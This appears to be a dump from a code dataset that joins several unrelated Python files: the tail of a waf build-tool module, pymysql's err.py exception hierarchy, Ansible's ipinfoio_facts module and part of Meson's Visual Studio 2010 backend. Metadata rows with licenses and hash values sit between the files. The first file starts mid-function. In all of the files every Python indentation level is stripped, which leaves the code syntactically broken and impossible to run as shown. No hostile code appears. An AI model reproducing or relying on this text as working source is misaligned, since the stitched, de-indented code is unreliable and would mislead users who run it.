if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
def subst_func(tsk):
"Substitutes variables in a .in file"
m4_re = re.compile('@(\w+)@', re.M)
code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
self.dep_vars = [] # additional environment variables to look
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
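# Illustrative wscript usage of the 'command-output' feature (the command and
# file names below are made up, not part of this tool):
#
#   def build(bld):
#       bld(features='command-output',
#           command='xsltproc',
#           command_is_external=True,
#           argv=[input_file('style.xsl'), input_file('doc.xml')],
#           stdout='doc.html')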
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
else:
assert isinstance(self.cwd, cmd_dir_arg)
self.cwd.find_node(self.path)
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
| gpl-2.0 | -2,328,467,615,840,488,400 | 27.223558 | 116 | 0.686909 | false |
nickster5001/ctracker | flask/lib/python3.4/site-packages/pymysql/err.py | 4 | 4306 | import struct
try:
Exception, Warning
except ImportError:
try:
from exceptions import Exception, Warning
except ImportError:
import sys
e = sys.modules['exceptions']
Exception = e.Exception
Warning = e.Warning
from .constants import ER
import sys
class MySQLError(Exception):
"""Exception related to operation with MySQL."""
class Warning(Warning, MySQLError):
"""Exception raised for important warnings like data truncations
while inserting, etc."""
class Error(MySQLError):
"""Exception that is the base class of all other error exceptions
(not Warning)."""
class InterfaceError(Error):
"""Exception raised for errors that are related to the database
interface rather than the database itself."""
class DatabaseError(Error):
"""Exception raised for errors that are related to the
database."""
class DataError(DatabaseError):
"""Exception raised for errors that are due to problems with the
processed data like division by zero, numeric value out of range,
etc."""
class OperationalError(DatabaseError):
"""Exception raised for errors that are related to the database's
operation and not necessarily under the control of the programmer,
e.g. an unexpected disconnect occurs, the data source name is not
found, a transaction could not be processed, a memory allocation
error occurred during processing, etc."""
class IntegrityError(DatabaseError):
"""Exception raised when the relational integrity of the database
is affected, e.g. a foreign key check fails, duplicate key,
etc."""
class InternalError(DatabaseError):
"""Exception raised when the database encounters an internal
error, e.g. the cursor is not valid anymore, the transaction is
out of sync, etc."""
class ProgrammingError(DatabaseError):
"""Exception raised for programming errors, e.g. table not found
or already exists, syntax error in the SQL statement, wrong number
of parameters specified, etc."""
class NotSupportedError(DatabaseError):
"""Exception raised in case a method or database API was used
which is not supported by the database, e.g. requesting a
.rollback() on a connection that does not support transaction or
has transactions turned off."""
error_map = {}
def _map_error(exc, *errors):
for error in errors:
error_map[error] = exc
_map_error(ProgrammingError, ER.DB_CREATE_EXISTS, ER.SYNTAX_ERROR,
ER.PARSE_ERROR, ER.NO_SUCH_TABLE, ER.WRONG_DB_NAME,
ER.WRONG_TABLE_NAME, ER.FIELD_SPECIFIED_TWICE,
ER.INVALID_GROUP_FUNC_USE, ER.UNSUPPORTED_EXTENSION,
ER.TABLE_MUST_HAVE_COLUMNS, ER.CANT_DO_THIS_DURING_AN_TRANSACTION)
_map_error(DataError, ER.WARN_DATA_TRUNCATED, ER.WARN_NULL_TO_NOTNULL,
ER.WARN_DATA_OUT_OF_RANGE, ER.NO_DEFAULT, ER.PRIMARY_CANT_HAVE_NULL,
ER.DATA_TOO_LONG, ER.DATETIME_FUNCTION_OVERFLOW)
_map_error(IntegrityError, ER.DUP_ENTRY, ER.NO_REFERENCED_ROW,
ER.NO_REFERENCED_ROW_2, ER.ROW_IS_REFERENCED, ER.ROW_IS_REFERENCED_2,
ER.CANNOT_ADD_FOREIGN)
_map_error(NotSupportedError, ER.WARNING_NOT_COMPLETE_ROLLBACK,
ER.NOT_SUPPORTED_YET, ER.FEATURE_DISABLED, ER.UNKNOWN_STORAGE_ENGINE)
_map_error(OperationalError, ER.DBACCESS_DENIED_ERROR, ER.ACCESS_DENIED_ERROR,
ER.TABLEACCESS_DENIED_ERROR, ER.COLUMNACCESS_DENIED_ERROR)
del _map_error, ER
def _get_error_info(data):
errno = struct.unpack('<h', data[1:3])[0]
if sys.version_info[0] == 3:
is_41 = data[3] == ord("#")
else:
is_41 = data[3] == "#"
if is_41:
# version 4.1
sqlstate = data[4:9].decode("utf8")
errorvalue = data[9:].decode("utf8")
return (errno, sqlstate, errorvalue)
else:
# version 4.0
return (errno, None, data[3:].decode("utf8"))
def _check_mysql_exception(errinfo):
errno, sqlstate, errorvalue = errinfo
errorclass = error_map.get(errno, None)
if errorclass:
raise errorclass(errno,errorvalue)
# couldn't find the right error number
raise InternalError(errno, errorvalue)
def raise_mysql_exception(data):
errinfo = _get_error_info(data)
_check_mysql_exception(errinfo)
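# Illustrative only: how the mapping above surfaces to callers. A duplicate
# key error (errno 1062, ER.DUP_ENTRY) is looked up in error_map and raised
# as IntegrityError, so application code can distinguish error families:
#
#   try:
#       cursor.execute("INSERT INTO t (id) VALUES (1)")
#   except IntegrityError:
#       pass        # duplicate key, broken foreign key, ...
#   except OperationalError:
#       pass        # lost connection, access denied, ...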
| mit | 7,623,619,764,364,948,000 | 28.292517 | 80 | 0.686716 | false |
andreaso/ansible | lib/ansible/modules/net_tools/ipinfoio_facts.py | 50 | 4074 | #!/usr/bin/python
#
# (c) 2016, Aleksei Kostiuk <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipinfoio_facts
short_description: "Retrieve IP geolocation facts of a host's IP address"
description:
- "Gather IP geolocation facts of a host's IP address using ipinfo.io API"
version_added: "2.3"
author: "Aleksei Kostiuk (@akostyuk)"
options:
timeout:
description:
- HTTP connection timeout in seconds
required: false
default: 10
http_agent:
description:
- Set http user agent
required: false
default: "ansible-ipinfoio-module/0.0.1"
notes:
- "Check http://ipinfo.io/ for more information"
'''
EXAMPLES = '''
# Retrieve geolocation data of a host's IP address
- name: get IP geolocation data
ipinfoio_facts:
'''
RETURN = '''
ansible_facts:
description: "Dictionary of ip geolocation facts for a host's IP address"
returned: changed
type: complex
contains:
ip:
description: "Public IP address of a host"
type: string
sample: "8.8.8.8"
hostname:
description: Domain name
type: string
sample: "google-public-dns-a.google.com"
country:
description: ISO 3166-1 alpha-2 country code
type: string
sample: "US"
region:
description: State or province name
type: string
sample: "California"
city:
description: City name
type: string
sample: "Mountain View"
loc:
description: Latitude and Longitude of the location
type: string
sample: "37.3860,-122.0838"
org:
description: "organization's name"
type: string
sample: "AS3356 Level 3 Communications, Inc."
postal:
description: Postal code
type: string
sample: "94035"
'''
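# Illustrative only: consuming the returned facts in a play (the register
# variable name is arbitrary):
#
#   - ipinfoio_facts:
#       timeout: 5
#     register: geo
#   - debug:
#       msg: "{{ geo.ansible_facts.ip }} is in {{ geo.ansible_facts.city }}"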
USER_AGENT = 'ansible-ipinfoio-module/0.0.1'
class IpinfoioFacts(object):
def __init__(self, module):
self.url = 'https://ipinfo.io/json'
self.timeout = module.params.get('timeout')
self.module = module
def get_geo_data(self):
response, info = fetch_url(self.module, self.url, force=True, # NOQA
timeout=self.timeout)
try:
assert info['status'] == 200
except AssertionError:
self.module.fail_json(msg='Could not get {} page, '
'check for connectivity!'.format(self.url))
else:
try:
content = response.read()
result = self.module.from_json(content.decode('utf8'))
except ValueError:
self.module.fail_json(
msg='Failed to parse the ipinfo.io response: '
'{0} {1}'.format(self.url, content))
else:
return result
def main():
module = AnsibleModule( # NOQA
argument_spec=dict(
http_agent=dict(default=USER_AGENT),
timeout=dict(type='int', default=10),
),
supports_check_mode=True,
)
ipinfoio = IpinfoioFacts(module)
ipinfoio_result = dict(
changed=False, ansible_facts=ipinfoio.get_geo_data())
module.exit_json(**ipinfoio_result)
from ansible.module_utils.basic import * # NOQA
from ansible.module_utils.urls import * # NOQA
if __name__ == '__main__':
main()
| gpl-3.0 | 5,952,106,428,594,388,000 | 27.690141 | 77 | 0.62273 | false |
QuLogic/meson | mesonbuild/backend/vs2010backend.py | 1 | 81951 | # Copyright 2014-2016 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
import xml.dom.minidom
import xml.etree.ElementTree as ET
import uuid
import typing as T
from pathlib import Path, PurePath
from . import backends
from .. import build
from .. import dependencies
from .. import mlog
from .. import compilers
from ..interpreter import Interpreter
from ..mesonlib import (
MesonException, python_command, replace_if_different, OptionKey,
)
from ..environment import Environment, build_filename
def autodetect_vs_version(build: T.Optional[build.Build], interpreter: T.Optional[Interpreter]):
vs_version = os.getenv('VisualStudioVersion', None)
vs_install_dir = os.getenv('VSINSTALLDIR', None)
if not vs_install_dir:
raise MesonException('Could not detect Visual Studio: Environment variable VSINSTALLDIR is not set!\n'
'Are you running meson from the Visual Studio Developer Command Prompt?')
# VisualStudioVersion is set since Visual Studio 12.0, but sometimes
# vcvarsall.bat doesn't set it, so also use VSINSTALLDIR
if vs_version == '14.0' or 'Visual Studio 14' in vs_install_dir:
from mesonbuild.backend.vs2015backend import Vs2015Backend
return Vs2015Backend(build, interpreter)
if vs_version == '15.0' or 'Visual Studio 17' in vs_install_dir or \
'Visual Studio\\2017' in vs_install_dir:
from mesonbuild.backend.vs2017backend import Vs2017Backend
return Vs2017Backend(build, interpreter)
if vs_version == '16.0' or 'Visual Studio 19' in vs_install_dir or \
'Visual Studio\\2019' in vs_install_dir:
from mesonbuild.backend.vs2019backend import Vs2019Backend
return Vs2019Backend(build, interpreter)
if 'Visual Studio 10.0' in vs_install_dir:
return Vs2010Backend(build, interpreter)
raise MesonException('Could not detect Visual Studio using VisualStudioVersion: {!r} or VSINSTALLDIR: {!r}!\n'
'Please specify the exact backend to use.'.format(vs_version, vs_install_dir))
def split_o_flags_args(args):
"""
Splits any /O args and returns them. Does not take care of flags overriding
previous ones. Skips non-O flag arguments.
['/Ox', '/Ob1'] returns ['/Ox', '/Ob1']
['/Oxj', '/MP'] returns ['/Ox', '/Oj']
"""
o_flags = []
for arg in args:
if not arg.startswith('/O'):
continue
flags = list(arg[2:])
# Assume that this one can't be clumped with the others since it takes
# an argument itself
if 'b' in flags:
o_flags.append(arg)
else:
o_flags += ['/O' + f for f in flags]
return o_flags
def generate_guid_from_path(path, path_type):
return str(uuid.uuid5(uuid.NAMESPACE_URL, 'meson-vs-' + path_type + ':' + str(path))).upper()
class Vs2010Backend(backends.Backend):
def __init__(self, build: T.Optional[build.Build], interpreter: T.Optional[Interpreter]):
super().__init__(build, interpreter)
self.name = 'vs2010'
self.project_file_version = '10.0.30319.1'
self.platform_toolset = None
self.vs_version = '2010'
self.windows_target_platform_version = None
self.subdirs = {}
self.handled_target_deps = {}
def get_target_private_dir(self, target):
return os.path.join(self.get_target_dir(target), target.get_id())
def generate_custom_generator_commands(self, target, parent_node):
generator_output_files = []
custom_target_include_dirs = []
custom_target_output_files = []
target_private_dir = self.relpath(self.get_target_private_dir(target), self.get_target_dir(target))
down = self.target_to_build_root(target)
for genlist in target.get_generated_sources():
if isinstance(genlist, (build.CustomTarget, build.CustomTargetIndex)):
for i in genlist.get_outputs():
# Path to the generated source from the current vcxproj dir via the build root
ipath = os.path.join(down, self.get_target_dir(genlist), i)
custom_target_output_files.append(ipath)
idir = self.relpath(self.get_target_dir(genlist), self.get_target_dir(target))
if idir not in custom_target_include_dirs:
custom_target_include_dirs.append(idir)
else:
generator = genlist.get_generator()
exe = generator.get_exe()
infilelist = genlist.get_inputs()
outfilelist = genlist.get_outputs()
source_dir = os.path.join(down, self.build_to_src, genlist.subdir)
exe_arr = self.build_target_to_cmd_array(exe)
idgroup = ET.SubElement(parent_node, 'ItemGroup')
for i in range(len(infilelist)):
if len(infilelist) == len(outfilelist):
sole_output = os.path.join(target_private_dir, outfilelist[i])
else:
sole_output = ''
curfile = infilelist[i]
infilename = os.path.join(down, curfile.rel_to_builddir(self.build_to_src))
deps = self.get_custom_target_depend_files(genlist, True)
base_args = generator.get_arglist(infilename)
outfiles_rel = genlist.get_outputs_for(curfile)
outfiles = [os.path.join(target_private_dir, of) for of in outfiles_rel]
generator_output_files += outfiles
args = [x.replace("@INPUT@", infilename).replace('@OUTPUT@', sole_output)
for x in base_args]
args = self.replace_outputs(args, target_private_dir, outfiles_rel)
args = [x.replace("@SOURCE_DIR@", self.environment.get_source_dir())
.replace("@BUILD_DIR@", target_private_dir)
for x in args]
args = [x.replace("@CURRENT_SOURCE_DIR@", source_dir) for x in args]
args = [x.replace("@SOURCE_ROOT@", self.environment.get_source_dir())
.replace("@BUILD_ROOT@", self.environment.get_build_dir())
for x in args]
args = [x.replace('\\', '/') for x in args]
cmd = exe_arr + self.replace_extra_args(args, genlist)
# Always use a wrapper because MSBuild eats random characters when
# there are many arguments.
tdir_abs = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
cmd, _ = self.as_meson_exe_cmdline(
'generator ' + cmd[0],
cmd[0],
cmd[1:],
workdir=tdir_abs,
capture=outfiles[0] if generator.capture else None,
force_serialize=True
)
deps = cmd[-1:] + deps
abs_pdir = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
os.makedirs(abs_pdir, exist_ok=True)
cbs = ET.SubElement(idgroup, 'CustomBuild', Include=infilename)
ET.SubElement(cbs, 'Command').text = ' '.join(self.quote_arguments(cmd))
ET.SubElement(cbs, 'Outputs').text = ';'.join(outfiles)
ET.SubElement(cbs, 'AdditionalInputs').text = ';'.join(deps)
return generator_output_files, custom_target_output_files, custom_target_include_dirs
def generate(self):
target_machine = self.interpreter.builtin['target_machine'].cpu_family_method(None, None)
if target_machine == '64' or target_machine == 'x86_64':
# amd64 or x86_64
self.platform = 'x64'
elif target_machine == 'x86':
# x86
self.platform = 'Win32'
elif target_machine == 'aarch64' or target_machine == 'arm64':
target_cpu = self.interpreter.builtin['target_machine'].cpu_method(None, None)
if target_cpu == 'arm64ec':
self.platform = 'arm64ec'
else:
self.platform = 'arm64'
elif 'arm' in target_machine.lower():
self.platform = 'ARM'
else:
raise MesonException('Unsupported Visual Studio platform: ' + target_machine)
self.buildtype = self.environment.coredata.get_option(OptionKey('buildtype'))
self.optimization = self.environment.coredata.get_option(OptionKey('optimization'))
self.debug = self.environment.coredata.get_option(OptionKey('debug'))
try:
self.sanitize = self.environment.coredata.get_option(OptionKey('b_sanitize'))
except MesonException:
self.sanitize = 'none'
sln_filename = os.path.join(self.environment.get_build_dir(), self.build.project_name + '.sln')
projlist = self.generate_projects()
self.gen_testproj('RUN_TESTS', os.path.join(self.environment.get_build_dir(), 'RUN_TESTS.vcxproj'))
self.gen_installproj('RUN_INSTALL', os.path.join(self.environment.get_build_dir(), 'RUN_INSTALL.vcxproj'))
self.gen_regenproj('REGEN', os.path.join(self.environment.get_build_dir(), 'REGEN.vcxproj'))
self.generate_solution(sln_filename, projlist)
self.generate_regen_info()
Vs2010Backend.touch_regen_timestamp(self.environment.get_build_dir())
@staticmethod
    def get_regen_stampfile(build_dir: str) -> str:
return os.path.join(os.path.join(build_dir, Environment.private_dir), 'regen.stamp')
@staticmethod
def touch_regen_timestamp(build_dir: str) -> None:
with open(Vs2010Backend.get_regen_stampfile(build_dir), 'w'):
pass
def get_vcvars_command(self):
has_arch_values = 'VSCMD_ARG_TGT_ARCH' in os.environ and 'VSCMD_ARG_HOST_ARCH' in os.environ
# Use vcvarsall.bat if we found it.
if 'VCINSTALLDIR' in os.environ:
            vs_version = os.environ.get('VisualStudioVersion', '')
            relative_path = 'Auxiliary\\Build\\' if vs_version >= '15.0' else ''
script_path = os.environ['VCINSTALLDIR'] + relative_path + 'vcvarsall.bat'
if os.path.exists(script_path):
if has_arch_values:
target_arch = os.environ['VSCMD_ARG_TGT_ARCH']
host_arch = os.environ['VSCMD_ARG_HOST_ARCH']
else:
target_arch = os.environ.get('Platform', 'x86')
host_arch = target_arch
arch = host_arch + '_' + target_arch if host_arch != target_arch else target_arch
return f'"{script_path}" {arch}'
# Otherwise try the VS2017 Developer Command Prompt.
if 'VS150COMNTOOLS' in os.environ and has_arch_values:
script_path = os.environ['VS150COMNTOOLS'] + 'VsDevCmd.bat'
if os.path.exists(script_path):
return '"%s" -arch=%s -host_arch=%s' % \
(script_path, os.environ['VSCMD_ARG_TGT_ARCH'], os.environ['VSCMD_ARG_HOST_ARCH'])
return ''
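    # Illustrative example of a returned value (the actual path depends on the
    # local Visual Studio installation):
    #   '"C:\\...\\VC\\Auxiliary\\Build\\vcvarsall.bat" x64'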
def get_obj_target_deps(self, obj_list):
result = {}
for o in obj_list:
if isinstance(o, build.ExtractedObjects):
result[o.target.get_id()] = o.target
return result.items()
def get_target_deps(self, t, recursive=False):
all_deps = {}
for target in t.values():
if isinstance(target, build.CustomTarget):
for d in target.get_target_dependencies():
all_deps[d.get_id()] = d
elif isinstance(target, build.RunTarget):
for d in target.get_dependencies():
all_deps[d.get_id()] = d
elif isinstance(target, build.BuildTarget):
for ldep in target.link_targets:
if isinstance(ldep, build.CustomTargetIndex):
all_deps[ldep.get_id()] = ldep.target
else:
all_deps[ldep.get_id()] = ldep
for ldep in target.link_whole_targets:
if isinstance(ldep, build.CustomTargetIndex):
all_deps[ldep.get_id()] = ldep.target
else:
all_deps[ldep.get_id()] = ldep
for obj_id, objdep in self.get_obj_target_deps(target.objects):
all_deps[obj_id] = objdep
else:
raise MesonException('Unknown target type for target %s' % target)
for gendep in target.get_generated_sources():
if isinstance(gendep, build.CustomTarget):
all_deps[gendep.get_id()] = gendep
elif isinstance(gendep, build.CustomTargetIndex):
all_deps[gendep.target.get_id()] = gendep.target
else:
generator = gendep.get_generator()
gen_exe = generator.get_exe()
if isinstance(gen_exe, build.Executable):
all_deps[gen_exe.get_id()] = gen_exe
for d in generator.depends:
if isinstance(d, build.CustomTargetIndex):
all_deps[d.get_id()] = d.target
else:
all_deps[d.get_id()] = d
if not t or not recursive:
return all_deps
ret = self.get_target_deps(all_deps, recursive)
ret.update(all_deps)
return ret
def generate_solution_dirs(self, ofile, parents):
prj_templ = 'Project("{%s}") = "%s", "%s", "{%s}"\n'
iterpaths = reversed(parents)
# Skip first path
next(iterpaths)
for path in iterpaths:
if path not in self.subdirs:
basename = path.name
identifier = generate_guid_from_path(path, 'subdir')
# top-level directories have None as their parent_dir
parent_dir = path.parent
parent_identifier = self.subdirs[parent_dir][0] \
if parent_dir != PurePath('.') else None
self.subdirs[path] = (identifier, parent_identifier)
prj_line = prj_templ % (
self.environment.coredata.lang_guids['directory'],
basename, basename, self.subdirs[path][0])
ofile.write(prj_line)
ofile.write('EndProject\n')
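    # Illustrative .sln fragment produced above for a subdirectory named 'src'
    # (GUID shortened; the project type GUID comes from lang_guids['directory']):
    #   Project("{2150E333-...}") = "src", "src", "{<generated GUID>}"
    #   EndProject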
def generate_solution(self, sln_filename, projlist):
default_projlist = self.get_build_by_default_targets()
sln_filename_tmp = sln_filename + '~'
with open(sln_filename_tmp, 'w', encoding='utf-8') as ofile:
ofile.write('Microsoft Visual Studio Solution File, Format '
'Version 11.00\n')
ofile.write('# Visual Studio ' + self.vs_version + '\n')
prj_templ = 'Project("{%s}") = "%s", "%s", "{%s}"\n'
for prj in projlist:
coredata = self.environment.coredata
if coredata.get_option(OptionKey('layout')) == 'mirror':
self.generate_solution_dirs(ofile, prj[1].parents)
target = self.build.targets[prj[0]]
lang = 'default'
if hasattr(target, 'compilers') and target.compilers:
for lang_out in target.compilers.keys():
lang = lang_out
break
prj_line = prj_templ % (
self.environment.coredata.lang_guids[lang],
prj[0], prj[1], prj[2])
ofile.write(prj_line)
target_dict = {target.get_id(): target}
# Get recursive deps
recursive_deps = self.get_target_deps(
target_dict, recursive=True)
ofile.write('EndProject\n')
for dep, target in recursive_deps.items():
if prj[0] in default_projlist:
default_projlist[dep] = target
test_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'RUN_TESTS', 'RUN_TESTS.vcxproj',
self.environment.coredata.test_guid)
ofile.write(test_line)
ofile.write('EndProject\n')
regen_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'REGEN', 'REGEN.vcxproj',
self.environment.coredata.regen_guid)
ofile.write(regen_line)
ofile.write('EndProject\n')
install_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'RUN_INSTALL', 'RUN_INSTALL.vcxproj',
self.environment.coredata.install_guid)
ofile.write(install_line)
ofile.write('EndProject\n')
ofile.write('Global\n')
ofile.write('\tGlobalSection(SolutionConfigurationPlatforms) = '
'preSolution\n')
ofile.write('\t\t%s|%s = %s|%s\n' %
(self.buildtype, self.platform, self.buildtype,
self.platform))
ofile.write('\tEndGlobalSection\n')
ofile.write('\tGlobalSection(ProjectConfigurationPlatforms) = '
'postSolution\n')
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.regen_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.Build.0 = %s|%s\n' %
(self.environment.coredata.regen_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
# Create the solution configuration
for p in projlist:
# Add to the list of projects in this solution
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(p[2], self.buildtype, self.platform,
self.buildtype, self.platform))
if p[0] in default_projlist and \
not isinstance(self.build.targets[p[0]], build.RunTarget):
# Add to the list of projects to be built
ofile.write('\t\t{%s}.%s|%s.Build.0 = %s|%s\n' %
(p[2], self.buildtype, self.platform,
self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.test_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.install_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
